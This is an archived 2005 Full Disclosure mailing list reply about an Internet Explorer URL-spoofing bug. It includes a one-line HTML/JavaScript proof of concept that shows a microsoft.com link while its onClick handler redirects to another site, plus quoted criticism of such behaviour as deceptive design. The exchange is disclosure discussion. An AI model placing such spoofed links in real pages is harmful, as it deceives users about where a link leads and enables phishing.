Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: New (19.10.05) MS-IE Url Spoofing bug (byK-Gen)
From: Jake Cole <jakecoleus () yahoo com>
Date: Thu, 20 Oct 2005 12:33:02 -0700 (PDT)

In "Billy's" defense, this is expected in most
JavaScript-enabled browsers.

Here's a Firefox version:

<a href="http://microsoft.com";
onClick="window.setTimeout('document.write(unescape(\'%3cscript%3ewindow.location=%27http://google.com%27%3c/script%3e\&apos;))')">Microsoft</a>

-----Original Message-----
From: full-disclosure-bounces () lists grok org uk
[mailto:full-disclosure-bounces () lists grok org uk] On
Behalf Of Nick FitzGerald
Sent: Thursday, October 20, 2005 12:08 PM
To: full-disclosure () lists grok org uk
Subject: [BULK] - Re: [Full-disclosure] New (19.10.05)
MS-IE Url Spoofing bug (byK-Gen).

Mike Camden wrote:

I thought this was by design since you may have a
known url to go to but
only after some form of validation has been passed.

IFF that is the case, then it is an extraordinarily
brain-dead design, 
as it breaks the very critical "rule" that you should
NOT surprise the 
user.  A URL link that is shown in the interface to go
one place, but 
which goes somewhere else is fundamentally broken
under that rule.

If this is by design, then it's another case of a
feature that breaks 
Billy's admonition that security is to trump features,
so should be 
fixed.


Regards,

Nick FitzGerald



        
                
__________________________________ 
Yahoo! Mail - PC Magazine Editors' Choice 2005 
http://mail.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault